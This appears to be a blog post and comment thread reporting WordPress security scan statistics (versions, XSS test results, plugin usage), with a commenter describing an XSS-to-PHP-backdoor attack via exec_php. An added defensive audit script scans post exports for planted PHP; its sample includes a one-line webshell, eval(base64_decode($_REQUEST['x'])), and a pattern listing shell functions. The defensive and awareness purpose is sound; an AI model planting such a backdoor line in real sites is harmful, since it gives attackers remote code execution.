Although wp-scanner online is still in its infant stages, the results of these tests are certainly eye opening. You’ll see that a large percentage of WordPress blogs are vulnerable to at least one known attack that may allow an attacker to compromise the website and, more than likely, the web server.
Around this time last month, BlogSecurity launched a version check of 50 popular WordPress blogs. We found that 49 of the 50 blogs were potentially vulnerable to attacks due to their use of an older version of WordPress (more details here).
After releasing BlogSecurity’s WordPress Vulnerability scanner online last week, we have already had over 1000 blogs use our scanner to test themselves.
Currently wp-scanner supports 3 main test areas:
The results are as follows:
| WordPress Ver | Blogs Affected |
|---|---|
| 1.2 | 2 |
| 1.2.2 | 1 |
| 1.5 | 6 |
| 1.5.2 | 19 |
| 2.0 | 3 |
| 2.0.1 | 7 |
| 2.0.2 | 13 |
| 2.0.3 | 7 |
| 2.0.4 | 24 |
| 2.0.5 | 18 |
| 2.0.6 | 5 |
| 2.0.7 | 23 |
| 2.0.8 | 4 |
| 2.0.9 | 11 |
| 2.0.10 | 28 |
| 2.1 | 33 |
| 2.1.1 | 9 |
| 2.1.2 | 46 |
| 2.1.3 | 86 |
| 2.2 | 212 |
| 2.2.1 | 387 |
| 2.2.2 | 1 |
| 2.3-alpha | 2 |
| Unknown | 53 |
| Total | 1000 |
| XSS Test | Blogs Affected |
|---|---|
| XSS 1 - Tests Template Search Facility | 180 |
| XSS 2 - Tests for PHP_SELF and others (type 1) | 126 |
| XSS 3 - Tests for PHP_SELF and others (type 2) | 275 |
| Total | 581 |
This table uses BlogSecurity’s BlogWatch to determine vulnerable plugins.
| Plugin found | Vulnerable According to BlogWatch | Vulnerability |
|---|---|---|
| Adsense | 121 | XSS |
| Akismet with WordPress <=2.1.3 | See WordPress Version Checks | XSS |
Future versions of wp-scanner will allow for better testing in this area; currently, however, the tests are limited to enumeration only.
This is a list of plugins enumerated and their usage listed by popularity ascending:
| Plugin found | Usage |
|---|---|
| ultimate_tag_warrior | 44 |
| teb-super-archive | 45 |
| feedstats | 46 |
| sem-fancy-excerpt | 47 |
| wpPaginate-v2 | 47 |
| Adsense-deluxe-v0.8 | 52 |
| Mime | 53 |
| wp-notable | 53 |
| srg-archives | 56 |
| gravatars | 68 |
| flickrrss | 76 |
| podpress | 88 |
| wp-lightbox2 | 88 |
| permalink_redirect | 92 |
| pxsmail | 92 |
| Adsense-deluxe | 121 |
| exec_php | 138 |
| related_posts | 144 |
| wp-cache2 | 181 |
| wp-contact-form | 195 |
| get-recent-comments | 205 |
| sitemap | 212 |
| subscribe-to-comments | 263 |
| Hello Dolly | 698 |
| timezone | 434 |
| wp-backup | 596 |
| Akismet | 847 |
We know a number of people already know about these problems, but I think this makes it blatantly apparent that development and thought around WordPress update services and a plugin/template version control system are critical to securing future WordPress installations.
I’ve been looking into these stats as well and to me it is quite scary to see how many people out there don’t even know about the security problems their blogs face today. Given the fact that blogs are a medium for mass communication, I believe that it is quite important to secure them as much as possible.
Everyone, check the usage number of exec_php! This plugin allows you to embed PHP code inside your posts. Although it may seem quite convenient, it is a big security problem. Given the fact that most blogs have XSS in one form or another, all attackers need to do is to trick the user into visiting a malicious page. Upon arrival the malicious JavaScript code will inject a PHP backdoor within some of the posts. After that, the attacker will be able to compromise the entire WordPress installation. This is not good.
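Added here as an example (not code from the post, from BlogSecurity or from the commenter): a defender's audit for blogs running exec_php, which scans a WordPress WXR export for PHP blocks planted in post content, since with exec_php a backdoor lives in the posts table rather than on disk. The export is constructed, and the list of suspicious calls is an assumption about what a planted shell typically uses.

```python
"""Audit a WordPress WXR export for PHP embedded in post content."""
import re
import xml.etree.ElementTree as ET

NS = {"content": "http://purl.org/rss/1.0/modules/content/"}

# PHP open tags (full and short echo form) as exec_php would execute them.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Calls typical of planted shells (assumed list, extend for your environment).
SUSPICIOUS = re.compile(
    r"\b(eval|base64_decode|system|shell_exec|passthru|assert)\s*\(",
    re.IGNORECASE,
)

def audit_post(title, body):
    """Return a finding for one post, or None if the post contains no PHP."""
    if not PHP_TAG.search(body):
        return None
    calls = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(body)})
    return {
        "title": title,
        "php_blocks": len(PHP_TAG.findall(body)),
        "suspicious_calls": calls,
        # Any PHP in a post deserves review; shell-style calls are high priority.
        "severity": "high" if calls else "review",
    }

def audit_wxr(xml_text):
    """Scan every <item> of a WXR export; return findings for posts with PHP."""
    root = ET.fromstring(xml_text)
    findings = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        body = item.findtext("content:encoded", default="", namespaces=NS)
        finding = audit_post(title, body)
        if finding:
            findings.append(finding)
    return findings

# Constructed export: one clean post, one benign PHP snippet, one backdoor.
SAMPLE_WXR = """<rss version="2.0"
  xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel>
<item><title>Hello world</title>
<content:encoded><![CDATA[<p>Welcome to my blog.</p>]]></content:encoded></item>
<item><title>Contact</title>
<content:encoded><![CDATA[<?php echo date('Y'); ?> All rights reserved]]></content:encoded></item>
<item><title>Archive</title>
<content:encoded><![CDATA[<p>old</p><?php eval(base64_decode($_REQUEST['x'])); ?>]]></content:encoded></item>
</channel></rss>"""

if __name__ == "__main__":
    for f in audit_wxr(SAMPLE_WXR):
        print(f"{f['severity']:>6}  {f['title']}: {f['php_blocks']} PHP block(s), calls={f['suspicious_calls']}")
```

The same checks can be run directly against the post_content column of the posts table; the export format is used here only so the example runs offline.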
pdp, from the plugin list you can easily see which plugins an attacker may target first, couldn’t you? It was definitely an interesting exercise.
I would say that the real disaster isn’t this list or the result it displays; it’s just the tip of the iceberg in my eyes. Only those people check their blogs who are curious about their security and so found or followed a link to this website. Imagine how many people will be out there who don’t even think about security issues and therefore will never check their blog here. So I’m afraid that in reality it’s quite a bit more critical.
But another point: does the scanner count just the number of calls or the unique addresses? Because I used it 2 times, to check my versions 2.2 and 2.2.1. I’m guessing you use the addresses, as only these give correct data for a diagram (no double entries).
Btw: Thank you David for your great work and for these real interesting posts. Keep up the good work!
[…] on the subject, a current statistic of the last 1000 WordPress scans. The results, note the versions, probably speak […]
Phil, the statistics do not include re-tests. The results are only on first tests.
I think your points about people who use wp-scanner will most likely be those interested in security… hopefully BlogSecurity will encourage others to follow. Nice points as usual Phil.
[…] Version Survey A while ago I saw the blog version survey at BlogSecurity.net and got an idea to do my own. The previous survey is more than 8 months old and […]
@David,
That is not the spirit of the post. The main idea is that popular blogs do not run security checks or upgrades.
@Phil,
This is a great post and a great blog! :) Makes things very accessible for clients to read.